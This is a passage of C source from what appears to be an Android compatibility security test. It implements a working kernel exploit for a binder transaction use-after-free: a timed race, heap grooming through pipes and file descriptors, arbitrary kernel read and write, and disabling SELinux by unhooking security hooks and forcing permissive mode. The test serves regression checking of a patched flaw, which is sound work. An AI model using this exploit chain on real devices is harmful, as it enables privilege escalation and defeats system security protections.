988 return (p & ~0xffful) + off;
989 }
990
find_adrp_add(u64 addr)991 u64 find_adrp_add(u64 addr) {
992 time_t test_started = start_timer();
993 while (timer_active(test_started)) {
994 u32 inst = r32(addr);
995 if (is_adrp(inst)) {
996 u64 ret = parse_adrp(addr, inst);
997 inst = r32(addr + 4);
998 if ((inst >> 22) != 0x244) {
999 fail("not add after adrp");
1000 return (u64)-1;
1001 }
1002 ret += (inst >> 10) & ((1u << 12) - 1);
1003 return ret;
1004 }
1005 addr += 4;
1006 }
1007 fail("adrp add not found");
1008 return (u64)-1;
1009 }
1010
locate_hooks()1011 u64 locate_hooks() {
1012 char path[256];
1013 DIR *d = opendir("/proc/self/map_files");
1014 char *p;
1015 while (1) {
1016 struct dirent *l = readdir(d);
1017 if (!l)
1018 fail("readdir fail");
1019 p = l->d_name;
1020 if (strcmp(p, ".") && strcmp(p, ".."))
1021 break;
1022 }
1023 sprintf(path, "/proc/self/map_files/%s", p);
1024 closedir(d);
1025 int fd = open(path, O_PATH | O_NOFOLLOW | O_RDONLY);
1026 if (fd < 0)
1027 fail("link open fail");
1028 struct stat st;
1029 if (fstat(fd, &st) < 0)
1030 fail("fstat fail");
1031 if (!S_ISLNK(st.st_mode))
1032 fail("link open fail");
1033 u64 file = get_file(fd);
1034 u64 inode = r64(file + 0x20);
1035 u64 iop = r64(inode + 0x20);
1036 u64 follow_link = r64(iop + 8);
1037 u64 cap = first_bl(follow_link);
1038 u64 scap = first_bl(cap);
1039 if (cap == (u64)-1 || scap == (u64)-1) {
1040 dbg("cap=%016zx", cap);
1041 dbg("scap=%016zx", scap);
1042 return (u64)-1;
1043 }
1044 u64 hooks = find_adrp_add(scap);
1045 close(fd);
1046 dbg("hooks=%016zx", hooks);
1047 return hooks;
1048 }
1049
unhook(u64 hooks,int idx)1050 void unhook(u64 hooks, int idx) {
1051 u64 hook = hooks + idx * 0x10;
1052 w128(hook, hook, hook);
1053 }
1054
locate_avc(u64 hooks)1055 u64 locate_avc(u64 hooks) {
1056 u64 se_file_open = r64(r64(hooks + 0x490) + 0x18);
1057 u64 seqno = first_bl(se_file_open);
1058 if (seqno == (u64)-1) {
1059 dbg("seqno=%016zx", seqno);
1060 return (u64)-1;
1061 }
1062 u64 avc = find_adrp_add(seqno);
1063 dbg("avc=%016zx", avc);
1064 return avc;
1065 }
1066
get_sid()1067 u32 get_sid() {
1068 u64 real_cred = r64(current + 0x788);
1069 u64 security = r64(real_cred + 0x78);
1070 u32 sid = r32(security + 4);
1071 dbg("sid=%u", sid);
1072 return sid;
1073 }
1074
1075 struct avc_node {
1076 u32 ssid;
1077 u32 tsid;
1078 u16 tclass;
1079 u16 pad;
1080 u32 allowed;
1081 };
1082
grant(u64 avc,u32 ssid,u32 tsid,u16 class)1083 u64 grant(u64 avc, u32 ssid, u32 tsid, u16 class) {
1084 struct avc_node n;
1085 n.ssid = ssid;
1086 n.tsid = tsid;
1087 n.tclass = class;
1088 n.pad = 0;
1089 n.allowed = ~0u;
1090 u64 node = scratch;
1091 for (int i = 0; i < 9; i++)
1092 w64(node + i * 8, 0);
1093 u64 *src = (u64*)&n;
1094 w64(node, src[0]);
1095 w64(node + 8, src[1]);
1096 int hash = (ssid ^ (tsid<<2) ^ (class<<4)) & 0x1ff;
1097 u64 head = avc + hash * 8;
1098 u64 hl = node + 0x28;
1099 u64 first = r64(head);
1100 w128(hl, first, head);
1101 if (first)
1102 w64(first + 8, hl);
1103 w64(head, hl);
1104 dbg("granted security sid");
1105 return hl;
1106 }
1107
enforce()1108 int enforce() {
1109 int fd = open("/sys/fs/selinux/enforce", O_RDONLY);
1110 if (fd < 0)
1111 return 1;
1112 dbg("enforce=%d", fd);
1113 char buf;
1114 if (read(fd, &buf, 1) != 1)
1115 return 1;
1116 close(fd);
1117 return buf == '1';
1118 }
1119
disable_enforce()1120 void disable_enforce() {
1121 int fd = open("/sys/fs/selinux/enforce", O_WRONLY);
1122 if (fd >= 0) {
1123 write(fd, "0", 1);
1124 close(fd);
1125 }
1126 if (enforce())
1127 fail("failed to switch selinux to permissive");
1128 dbg("selinux now permissive");
1129 }
1130
disable_selinux()1131 void disable_selinux() {
1132 if (!enforce()) {
1133 dbg("selinux already permissive");
1134 return;
1135 }
1136 u64 hooks = locate_hooks();
1137 if (hooks == (u64)-1) {
1138 return;
1139 }
1140 u64 avc = locate_avc(hooks);
1141 if (avc == (u64)-1) {
1142 return;
1143 }
1144 unhook(hooks, 0x08); // capable
1145 unhook(hooks, 0x2f); // inode_permission
1146 unhook(hooks, 0x3d); // file_permission
1147 unhook(hooks, 0x49); // file_open
1148 u64 avcnode = grant(avc, get_sid(), 2, 1);
1149 disable_enforce();
1150 hlist_del(avcnode);
1151 }
1152
1153 #define PIPES 8
1154 #define STAGE2_THREADS 64
1155
1156 int cpumask;
1157 int cpu1;
1158 int cpu2;
1159 int tot_cpus;
1160 const char *pipedir;
1161 char *pipepath;
1162 char *pipeid;
1163 int pipefd[PIPES];
1164 sync_t *free_sync;
1165 sync_t *poll_sync;
1166 sync_t *stage2_sync1;
1167 sync_t *stage2_sync2;
1168 sync_t *rw_thread_sync;
1169 int bnd1, bnd2;
1170 u32 to1;
1171 u64 free_ptr;
1172 u64 trigger_time;
1173 int total_txns;
1174 int bad_pipe;
1175 int uaf_pipe;
1176 volatile int uaf_alloc_success;
1177 u64 pipe_inode_info;
1178 int rw_thread_tid;
1179 volatile int rw_cmd;
1180 volatile int rw_bit;
1181 volatile int rw_val;
1182 u64 free_data;
1183 u64 next_free_data;
1184
select_cpus()1185 void select_cpus() {
1186 cpu1 = cpu2 = -1;
1187 for (int i = 7; i >= 0; i--) {
1188 if (do_set_cpu(i) < 0)
1189 continue;
1190 cpumask |= (1 << i);
1191 if (cpu1 < 0)
1192 cpu1 = i;
1193 else if (cpu2 < 0)
1194 cpu2 = i;
1195 tot_cpus++;
1196 }
1197 if (cpu1 < 0 || cpu2 < 0) {
1198 fail("huh, couldn't find 2 cpus");
1199 }
1200 dbg("cpumask=%02x cpu1=%d cpu2=%d", cpumask, cpu1, cpu2);
1201 }
1202
1203 void rw_thread(u64 idx);
1204 void free_thread(u64 arg);
1205 void poll_thread(u64 arg);
1206
cpu_available(int cpu)1207 int cpu_available(int cpu) {
1208 return !!(cpumask & (1 << cpu));
1209 }
1210
hog_cpu_thread(u64 arg)1211 void hog_cpu_thread(u64 arg) {
1212 set_cpu(cpu2);
1213 time_t test_started = start_timer();
1214 while (timer_active(test_started)) {
1215 }
1216 }
1217
launch_threads()1218 void launch_threads() {
1219 launch_thread("txnuaf.log", log_thread, NULL, 0, 1);
1220 launch_thread("txnuaf.hog", hog_cpu_thread, NULL, 0, 1);
1221 launch_thread("txnuaf.free", free_thread, &free_sync, 0, 1);
1222 launch_thread("txnuaf.poll", poll_thread, &poll_sync, 0, 1);
1223 rw_thread_tid = launch_thread("txnuaf.rw", rw_thread, &rw_thread_sync, 0, 0);
1224 }
1225
open_binders()1226 void open_binders() {
1227 u32 xchg;
1228 bnd1 = get_binder(&xchg);
1229 exchg_put_binder(bnd1, xchg);
1230 dec_ref(bnd1, xchg);
1231 bnd2 = get_binder(&xchg);
1232 to1 = exchg_get_binder(bnd2, xchg);
1233 dec_ref(bnd1, xchg);
1234 }
1235
make_pipe_path()1236 void make_pipe_path() {
1237 size_t l = strlen(pipedir);
1238 pipepath = malloc(l + 4); // "/pd\0"
1239 strcpy(pipepath, pipedir);
1240 pipepath[l++] = '/';
1241 pipeid = pipepath + l;
1242 }
1243
open_pipe(int idx)1244 int open_pipe(int idx) {
1245 if (!pipepath)
1246 make_pipe_path();
1247 sprintf(pipeid, "p%d", idx);
1248 int fd = open(pipepath, O_RDWR);
1249 if (fd < 0)
1250 fail("pipe open fail");
1251 return fd;
1252 }
1253
open_pipes()1254 void open_pipes() {
1255 for (int i = 0; i < PIPES; i++)
1256 pipefd[i] = open_pipe(i);
1257 }
1258
do_poll(int fd,int timeout)1259 int do_poll(int fd, int timeout) {
1260 struct pollfd pfd;
1261 pfd.fd = fd;
1262 pfd.events = 0;
1263 pfd.revents = 0;
1264 if (poll(&pfd, 1, timeout) < 0)
1265 fail("pipe poll fail");
1266 return pfd.revents;
1267 }
1268
find_bad_pipe()1269 int find_bad_pipe() {
1270 for (int i = 0; i < PIPES; i++) {
1271 if (do_poll(pipefd[i], 0) & POLLHUP) {
1272 dbg("corrupted pipe at %d", i);
1273 bad_pipe = pipefd[i];
1274 sprintf(pipeid, "p%d", i);
1275 return 1;
1276 }
1277 }
1278 return 0;
1279 }
1280
close_pipes()1281 void close_pipes() {
1282 for (int i = 0; i < PIPES; i++) {
1283 if (close(pipefd[i]) < 0)
1284 fail("close pipe fail, i=%d fd=%d", i, pipefd[i]);
1285 }
1286 }
1287
free_thread(u64 arg)1288 void free_thread(u64 arg) {
1289 set_timerslack();
1290 set_cpu(cpu1);
1291 set_idle();
1292 time_t test_started = start_timer();
1293 while (timer_active(test_started)) {
1294 sync_wait(free_sync);
1295 buf_t *buf = new_buf();
1296 buf_u32(buf, BC_FREE_BUFFER);
1297 buf_uintptr(buf, free_ptr);
1298 struct binder_write_read bwr;
1299 memset(&bwr, 0x00, sizeof(bwr));
1300 bwr.write_buffer = (u64)buf->p;
1301 bwr.write_size = buf->off;
1302 int off = cpu1 < 4 ? 1300 : 350;
1303 u64 target_time = trigger_time - off;
1304 while (time_now() < target_time)
1305 ;
1306 ioctl(bnd1, BINDER_WRITE_READ, &bwr);
1307 free_buf(buf);
1308 sync_done(free_sync);
1309 }
1310 };
1311
race_cycle()1312 void race_cycle() {
1313 dbg("race cycle, this may take time...");
1314 time_t test_started = start_timer();
1315 while (timer_active(test_started)) {
1316 send_txn(bnd2, to1, 0, NULL, NULL);
1317 txn_t t1, t2;
1318 recv_txn(bnd1, &t1);
1319 free_ptr = txn_buf(&t1);
1320 trigger_time = time_now() + 100000;
1321 sync_signal(free_sync);
1322 sleep_until(trigger_time);
1323 send_reply(bnd1);
1324 open_pipes();
1325 recv_txn(bnd2, &t2);
1326 free_txn(&t2);
1327 sync_wait_done(free_sync);
1328 if (find_bad_pipe())
1329 break;
1330 close_pipes();
1331 }
1332 }
1333
reopen_pipe()1334 void reopen_pipe() {
1335 uaf_pipe = open(pipepath, O_WRONLY);
1336 if (uaf_pipe < 0)
1337 fail("reopen pipe fail");
1338 }
1339
1340 void stage2_thread(u64 cpu);
1341
stage2_launcher(u64 arg)1342 void stage2_launcher(u64 arg) {
1343 dup2(uaf_pipe, 0);
1344 dup2(bnd1, 1);
1345 dup2(bnd2, 2);
1346 for (int i = 3; i < 1024; i++)
1347 close(i);
1348 unshare_following_clone_files();
1349 int cpu_count = get_nprocs_conf();
1350 for (int cpu = 0; cpu < cpu_count; cpu++) {
1351 if (cpu_available(cpu)) {
1352 for (int i = 0; i < STAGE2_THREADS; i++)
1353 launch_thread("txnuaf.stage2", stage2_thread, NULL, cpu, 0);
1354 }
1355 }
1356 }
1357
signal_xpl_threads()1358 void signal_xpl_threads() {
1359 sync_signal(stage2_sync1);
1360 sync_wait_done(stage2_sync1);
1361 sync_signal(stage2_sync2);
1362 sync_wait_done(stage2_sync2);
1363 }
1364
launch_stage2_threads()1365 void launch_stage2_threads() {
1366 stage2_sync1 = alloc_sync();
1367 stage2_sync2 = alloc_sync();
1368 sync_set_num_waiters(stage2_sync1, STAGE2_THREADS);
1369 sync_set_num_waiters(stage2_sync2, (tot_cpus - 1) * STAGE2_THREADS);
1370 hook_clone();
1371 unshare_following_clone_files();
1372 launch_thread("txnuaf.stage2_launcher", stage2_launcher, NULL, 0, 0);
1373 // set cpu
1374 signal_xpl_threads();
1375 }
1376
alloc_txns(int n)1377 void alloc_txns(int n) {
1378 total_txns += n;
1379 size_t totsz = n * (4 + sizeof(struct binder_transaction_data));
1380 buf_t *buf = new_buf_sz(totsz);
1381 for (int i = 0; i < n; i++) {
1382 buf_u32(buf, BC_TRANSACTION);
1383 struct binder_transaction_data *tr;
1384 tr = buf_alloc(buf, sizeof(*tr));
1385 tr->target.handle = to1;
1386 tr->code = 0;
1387 tr->flags |= TF_ONE_WAY;
1388 tr->data.ptr.buffer = 0;
1389 tr->data.ptr.offsets = 0;
1390 tr->data_size = 0;
1391 tr->offsets_size = 0;
1392 }
1393 binder_write(bnd2, buf);
1394 }
1395
recv_all_txns(int fd)1396 void recv_all_txns(int fd) {
1397 for (int i = 0; i < total_txns; i++) {
1398 txn_t t;
1399 recv_txn(fd, &t);
1400 free_txn(&t);
1401 }
1402 }
1403
clean_slab()1404 void clean_slab() {
1405 // clean node
1406 alloc_txns(4096);
1407 // clean each cpu
1408 int cpu_count = get_nprocs_conf();
1409 for (int i = 0; i < cpu_count; i++) {
1410 if (cpu_available(i)) {
1411 set_cpu(i);
1412 alloc_txns(512);
1413 }
1414 }
1415 set_cpu(cpu1);
1416 // for good measure
1417 alloc_txns(128);
1418 }
1419
poll_thread(u64 arg)1420 void poll_thread(u64 arg) {
1421 set_timerslack();
1422 sync_wait(poll_sync);
1423 do_poll(uaf_pipe, 200);
1424 dbg("poll timeout");
1425 sync_done(poll_sync);
1426 }
1427
free_pipe_alloc_fdmem()1428 void free_pipe_alloc_fdmem() {
1429 clean_slab();
1430 sync_signal(poll_sync);
1431 usleep(50000);
1432 if (close(bad_pipe) < 0) {
1433 fail("free close fail");
1434 return;
1435 }
1436 // alloc fdmem
1437 signal_xpl_threads();
1438 // set all bits
1439 signal_xpl_threads();
1440 dbg("fdmem spray done");
1441 sync_wait_done(poll_sync);
1442 recv_all_txns(bnd1);
1443 }
1444
find_pipe_slot_thread()1445 void find_pipe_slot_thread() {
1446 signal_xpl_threads();
1447 if (!uaf_alloc_success)
1448 fail("inode_info uaf alloc fail - this may sometimes happen, "
1449 "kernel may crash after you close the app");
1450 }
1451
set_all_bits()1452 void set_all_bits() {
1453 for (int i = 0x1ff; i >= 3; i--)
1454 if (dup2(1, i) < 0)
1455 fail("dup2 fail, fd=%d", i);
1456 }
1457
winfo32_lo(int addr,u32 dat)1458 void winfo32_lo(int addr, u32 dat) {
1459 int startbit = addr ? 0 : 3;
1460 addr *= 8;
1461 for (int i = startbit; i < 32; i++) {
1462 int fd = addr + i;
1463 if (dat & (1ul << i)) {
1464 if (dup2(1, fd) < 0)
1465 fail("winfo dup2 fail, fd=%d", fd);
1466 } else {
1467 if (close(fd) < 0 && errno != EBADF)
1468 fail("winfo close fail, fd=%d", fd);
1469 }
1470 }
1471 }
1472
winfo32_hi(int addr,u32 dat)1473 void winfo32_hi(int addr, u32 dat) {
1474 addr *= 8;
1475 for (int i = 0; i < 32; i++) {
1476 u32 bit = dat & (1u << i);
1477 int fd = addr + i;
1478 if (fcntl(fd, F_SETFD, bit ? FD_CLOEXEC : 0) < 0) {
1479 if (errno != EBADF || bit)
1480 fail("winfo fcntl fail fd=%d", fd);
1481 }
1482 }
1483 }
1484
winfo32(int addr,u32 dat)1485 void winfo32(int addr, u32 dat) {
1486 if (addr < 0x40)
1487 winfo32_lo(addr, dat);
1488 else
1489 winfo32_hi(addr - 0x40, dat);
1490 }
1491
winfo64(int addr,u64 dat)1492 void winfo64(int addr, u64 dat) {
1493 winfo32(addr, dat);
1494 winfo32(addr + 4, dat >> 32);
1495 }
1496
rinfo64(int addr)1497 u64 rinfo64(int addr) {
1498 addr *= 8;
1499 u64 ret = 0;
1500 for (int i = 0; i < 64; i++) {
1501 int fd = addr + i;
1502 fd_set set;
1503 FD_ZERO(&set);
1504 FD_SET(fd, &set);
1505 struct timeval timeout;
1506 timeout.tv_sec = 0;
1507 timeout.tv_usec = 0;
1508 if (select(fd + 1, &set, NULL, NULL, &timeout) >= 0)
1509 ret |= 1ul << i;
1510 else if (errno != EBADF)
1511 fail("leak select fail");
1512 }
1513 return ret;
1514 }
1515
1516 int files_off = 0x30;
1517 int file_off = 0x48;
1518 int fdt_off = 0x58;
1519 int fmode_off = 0x78;
1520 int faoff = 0x10;
1521
set_pipe_mutex_count(u32 count)1522 void set_pipe_mutex_count(u32 count) {
1523 winfo32(0, count);
1524 }
1525
set_pipe_nrbufs(u32 nrbufs)1526 void set_pipe_nrbufs(u32 nrbufs) {
1527 winfo32(0x40, nrbufs);
1528 }
1529
set_pipe_curbuf(u32 curbuf)1530 void set_pipe_curbuf(u32 curbuf) {
1531 winfo32(0x44, curbuf);
1532 }
1533
set_pipe_buffers(u32 buffers)1534 void set_pipe_buffers(u32 buffers) {
1535 winfo32(0x48, buffers);
1536 }
1537
set_pipe_readers(u32 readers)1538 void set_pipe_readers(u32 readers) {
1539 winfo32(0x4c, readers);
1540 }
1541
set_pipe_fasync_readers(u64 fasync_readers)1542 void set_pipe_fasync_readers(u64 fasync_readers) {
1543 winfo64(0x70, fasync_readers);
1544 }
1545
set_pipe_wait_next(u64 next)1546 void set_pipe_wait_next(u64 next) {
1547 winfo64(0x30, next);
1548 }
1549
get_pipe_wait_next()1550 u64 get_pipe_wait_next() {
1551 return rinfo64(0x30);
1552 }
1553
set_fa_magic(u32 magic)1554 void set_fa_magic(u32 magic) {
1555 winfo32(faoff + 4, magic);
1556 }
1557
set_fa_next(u64 next)1558 void set_fa_next(u64 next) {
1559 winfo64(faoff + 0x10, next);
1560 }
1561
set_fa_file(u64 file)1562 void set_fa_file(u64 file) {
1563 winfo64(faoff + 0x18, file);
1564 }
1565
get_mutex_owner()1566 u64 get_mutex_owner() {
1567 return rinfo64(0x18);
1568 }
1569
set_files_count(int count)1570 void set_files_count(int count) {
1571 winfo32(files_off, count);
1572 }
1573
set_files_fdt(u64 fdt)1574 void set_files_fdt(u64 fdt) {
1575 winfo64(files_off + 0x20, fdt);
1576 }
1577
set_fdt_max_fds(u32 max_fds)1578 void set_fdt_max_fds(u32 max_fds) {
1579 winfo32(fdt_off, max_fds);
1580 }
1581
set_fdt_fdarr(u64 fdarr)1582 void set_fdt_fdarr(u64 fdarr) {
1583 winfo64(fdt_off + 8, fdarr);
1584 }
1585
set_fdt_close_on_exec(u64 close_on_exec)1586 void set_fdt_close_on_exec(u64 close_on_exec) {
1587 winfo64(fdt_off + 0x10, close_on_exec);
1588 }
1589
set_file_fmode(u32 fmode)1590 void set_file_fmode(u32 fmode) {
1591 winfo32(fmode_off, fmode);
1592 }
1593
set_file(u64 file)1594 void set_file(u64 file) {
1595 winfo64(file_off, file);
1596 }
1597
1598 void stage2();
1599
stage2_thread(u64 cpu)1600 void stage2_thread(u64 cpu) {
1601 sync_t *sync = cpu == cpu1 ? stage2_sync1 : stage2_sync2;
1602 sync_wait(sync);
1603 do_set_cpu(cpu);
1604 sync_done(sync);
1605
1606 sync_wait(sync);
1607 if (dup2(1, 0x1ff) < 0) {
1608 fail("dup2 fail");
1609 return;
1610 }
1611 sync_done(sync);
1612
1613 sync_wait(sync);
1614 set_all_bits();
1615 sync_done(sync);
1616
1617 sync_wait(sync);
1618 u64 wait_list = get_pipe_wait_next();
1619 int ok = wait_list != -1l;
1620 if (ok) {
1621 uaf_alloc_success = 1;
1622 pipe_inode_info = wait_list - 0x30;
1623 dbg("pipe_inode_info=%016zx", pipe_inode_info);
1624 }
1625 sync_done(sync);
1626 if (ok)
1627 stage2();
1628 }
1629
write_pipe_ptr_to(u64 addr)1630 void write_pipe_ptr_to(u64 addr) {
1631 set_pipe_wait_next(addr - 8);
1632 do_poll(0, 50);
1633 }
1634
overwrite_pipe_bufs()1635 void overwrite_pipe_bufs() {
1636 write_pipe_ptr_to(pipe_inode_info + 0x80);
1637 }
1638
leak_task_ptr()1639 void leak_task_ptr() {
1640 set_pipe_mutex_count(0x7);
1641 set_pipe_wait_next(pipe_inode_info + 0x30);
1642 u64 faptr = pipe_inode_info + faoff;
1643 set_pipe_fasync_readers(faptr);
1644 set_pipe_nrbufs(3);
1645 set_pipe_curbuf(0);
1646 set_pipe_buffers(4);
1647 set_pipe_readers(1);
1648 set_fa_magic(0x4601);
1649 set_fa_next(faptr);
1650 set_fa_file(0xfffffffful); // overlaps with inode_info.wait.lock
1651 sync_signal(rw_thread_sync);
1652 // wait for rw thread to write mutex owner
1653 usleep(100000);
1654 rw_task = get_mutex_owner();
1655 dbg("rw_task=%016zx", rw_task);
1656 // unblock rw thread
1657 set_fa_magic(0);
1658 if (syscall(SYS_tkill, rw_thread_tid, SIGUSR2) < 0)
1659 fail("tkill fail");
1660 dbg("signaled rw_thread");
1661 sync_wait_done(rw_thread_sync);
1662 // wait until klogd has logged the bad magic number error
1663 sleep(1);
1664 }
1665
overwrite_task_files(u64 task)1666 void overwrite_task_files(u64 task) {
1667 write_pipe_ptr_to(task + 0x7c0);
1668 }
1669
sigfunc(int a)1670 void sigfunc(int a) {
1671 }
1672
1673 enum {cmd_read, cmd_write, cmd_exit};
1674
handle_sig()1675 void handle_sig() {
1676 struct sigaction sa;
1677 memset(&sa, 0x00, sizeof(sa));
1678 sa.sa_handler = sigfunc;
1679 if (sigaction(SIGUSR2, &sa, NULL) < 0)
1680 fail("sigaction fail");
1681 }
1682
rw_thread(u64 idx)1683 void rw_thread(u64 idx) {
1684 handle_sig();
1685 sync_wait(rw_thread_sync);
1686 {
1687 void *dat = malloc(0x2000);
1688 dbg("starting blocked write");
1689 if (write(uaf_pipe, dat, 0x2000) != 0x1000) {
1690 fail("expected blocking write=0x1000");
1691 free(dat);
1692 return;
1693 }
1694 free(dat);
1695 }
1696 dbg("write unblocked");
1697 sync_done(rw_thread_sync);
1698 int done = 0;
1699 while (!done) {
1700 sync_wait(rw_thread_sync);
1701 if (rw_cmd == cmd_read) {
1702 int bits = fcntl(rw_bit, F_GETFD);
1703 if (bits < 0) {
1704 fail("F_GETFD fail");
1705 return;
1706 }
1707 rw_val = !!(bits & FD_CLOEXEC);
1708 } else if (rw_cmd == cmd_write) {
1709 if (fcntl(rw_bit, F_SETFD, rw_val ? FD_CLOEXEC : 0) < 0) {
1710 fail("F_SETFD fail");
1711 return;
1712 }
1713 } else {
1714 done = 1;
1715 }
1716 sync_done(rw_thread_sync);
1717 }
1718 }
1719
set_fdarr(int bit)1720 void set_fdarr(int bit) {
1721 set_fdt_fdarr(pipe_inode_info + file_off - bit * 8);
1722 }
1723
r8(u64 addr)1724 u8 r8(u64 addr) {
1725 u8 val = 0;
1726 set_fdt_close_on_exec(addr);
1727 for (int bit = 0; bit < 8; bit++) {
1728 set_fdarr(bit);
1729 rw_bit = bit;
1730 rw_cmd = cmd_read;
1731 sync_signal(rw_thread_sync);
1732 sync_wait_done(rw_thread_sync);
1733 val |= rw_val << bit;
1734 }
1735 return val;
1736 }
1737
w8(u64 addr,u8 val)1738 void w8(u64 addr, u8 val) {
1739 set_fdt_close_on_exec(addr);
1740 for (int bit = 0; bit < 8; bit++) {
1741 set_fdarr(bit);
1742 rw_bit = bit;
1743 rw_val = val & (1 << bit);
1744 rw_cmd = cmd_write;
1745 sync_signal(rw_thread_sync);
1746 sync_wait_done(rw_thread_sync);
1747 }
1748 }
1749
exit_rw_thread()1750 void exit_rw_thread() {
1751 rw_cmd = cmd_exit;
1752 sync_signal(rw_thread_sync);
1753 sync_wait_done(rw_thread_sync);
1754 }
1755
w16(u64 addr,u16 val)1756 void w16(u64 addr, u16 val) {
1757 w8(addr, val);
1758 w8(addr + 1, val >> 8);
1759 }
1760
w32(u64 addr,u32 val)1761 void w32(u64 addr, u32 val) {
1762 w16(addr, val);
1763 w16(addr + 2, val >> 16);
1764 }
1765
w64(u64 addr,u64 val)1766 void w64(u64 addr, u64 val) {
1767 w32(addr, val);
1768 w32(addr + 4, val >> 32);
1769 }
1770
r16(u64 addr)1771 u16 r16(u64 addr) {
1772 return r8(addr) | (r8(addr + 1) << 8);
1773 }
1774
r32(u64 addr)1775 u32 r32(u64 addr) {
1776 return r16(addr) | (r16(addr + 2) << 16);
1777 }
1778
r64(u64 addr)1779 u64 r64(u64 addr) {
1780 return r32(addr) | (u64)r32(addr + 4) << 32;
1781 }
1782
1783 #define magic 0x55565758595a5b5cul
1784
set_up_arbitrary_rw()1785 void set_up_arbitrary_rw() {
1786 overwrite_task_files(rw_task);
1787 set_all_bits();
1788 set_files_count(1);
1789 set_files_fdt(pipe_inode_info + fdt_off);
1790 set_fdt_max_fds(8);
1791 set_file(pipe_inode_info + fmode_off - 0x44);
1792 set_file_fmode(0);
1793 u64 magic_addr = scratch;
1794 w64(magic_addr, magic);
1795 if (r64(magic_addr) != magic)
1796 fail("rw test fail");
1797 dbg("got arbitrary rw");
1798 }
1799
get_current()1800 u64 get_current() {
1801 int our_tid = gettid();
1802 u64 leader = r64(rw_task + 0x610);
1803 u64 task = leader;
1804
1805 time_t test_started = start_timer();
1806 while (timer_active(test_started)) {
1807 int tid = r32(task + 0x5d0);
1808 if (tid == our_tid)
1809 return task;
1810 task = r64(task + 0x680) - 0x680;
1811 if (task == leader)
1812 break;
1813 }
1814 fail("current not found");
1815 return (u64)-1;
1816 }
1817
get_fdarr()1818 void get_fdarr() {
1819 current = get_current();
1820 if (current == (u64)-1) {
1821 return;
1822 }
1823 dbg("current=%016zx", current);
1824 u64 files = r64(current + 0x7c0);
1825 u64 fdt = r64(files + 0x20);
1826 fdarr = r64(fdt + 8);
1827 }
1828
place_bnd_buf(u64 v1,u64 v2,txn_t * t)1829 void place_bnd_buf(u64 v1, u64 v2, txn_t *t) {
1830 txn_t t2;
1831 int do_free = !t;
1832 if (!t)
1833 t = &t2;
1834 buf_t *dat = new_buf();
1835 buf_u64(dat, v1);
1836 buf_u64(dat, v2);
1837 send_txn(2, to1, 0, dat, NULL);
1838 recv_txn(1, t);
1839 if (do_free)
1840 free_txn(t);
1841 send_reply(1);
1842 recv_txn(2, &t2);
1843 free_txn(&t2);
1844 }
1845
w128(u64 addr,u64 v1,u64 v2)1846 void w128(u64 addr, u64 v1, u64 v2) {
1847 w64(free_data, addr);
1848 w64(next_free_data, addr + 0x10);
1849 place_bnd_buf(v1, v2, NULL);
1850 }
1851
set_up_w128()1852 void set_up_w128() {
1853 u64 bnd = get_file(1);
1854 u64 proc = r64(bnd + 0xd0);
1855 u64 alloc = proc + 0x1c0;
1856 enter_looper(1);
1857 txn_t t1, t2;
1858 place_bnd_buf(0, 0, &t1);
1859 place_bnd_buf(0, 0, &t2);
1860 free_txn(&t1);
1861 u64 free_buffer = r64(alloc + 0x48);
1862 u64 next = r64(free_buffer);
1863 w64(alloc + 0x38, 0);
1864 w64(alloc + 0x78, ~0ul);
1865 free_data = free_buffer + 0x58;
1866 next_free_data = next + 0x58;
1867 u64 magic_addr = scratch + 8;
1868 w128(magic_addr, magic, magic);
1869 if (r64(magic_addr) != magic || r64(magic_addr + 8) != magic)
1870 fail("w128 test fail");
1871 dbg("got w128");
1872 }
1873
clean_up()1874 void clean_up() {
1875 w64(fdarr, 0);
1876 set_files_count(2);
1877 exit_rw_thread();
1878 }
1879
exploit()1880 void exploit() {
1881 set_thread_name("txnuaf");
1882 select_cpus();
1883 set_cpu(cpu1);
1884 set_timerslack();
1885 launch_threads();
1886 open_binders();
1887 race_cycle();
1888 reopen_pipe();
1889 launch_stage2_threads();
1890 free_pipe_alloc_fdmem();
1891 find_pipe_slot_thread();
1892 }
1893
stage2()1894 void stage2() {
1895 scratch = pipe_inode_info + 0xb8;
1896 overwrite_pipe_bufs();
1897 leak_task_ptr();
1898 set_up_arbitrary_rw();
1899 get_fdarr();
1900 set_up_w128();
1901 winfo32(0, 0x7);
1902 disable_selinux();
1903 clean_up();
1904 }
1905
1906 JNIEXPORT void JNICALL
Java_android_security_cts_ExploitThread_runxpl(JNIEnv * e,jobject t,jstring jpipedir)1907 Java_android_security_cts_ExploitThread_runxpl(JNIEnv *e, jobject t, jstring jpipedir) {
1908 this = (*e)->NewGlobalRef(e, t);
1909 add_jenv(e);
1910 (*e)->GetJavaVM(e, &jvm);
1911 jclass cls = (*e)->GetObjectClass(e, this);
1912 add_log = (*e)->GetMethodID(e, cls, "addLog", "(Ljava/lang/String;)V");
1913 pipedir = (*e)->GetStringUTFChars(e, jpipedir, NULL);
1914 exploit();
1915 (*e)->ReleaseStringUTFChars(e, jpipedir, pipedir);
1916 }
1917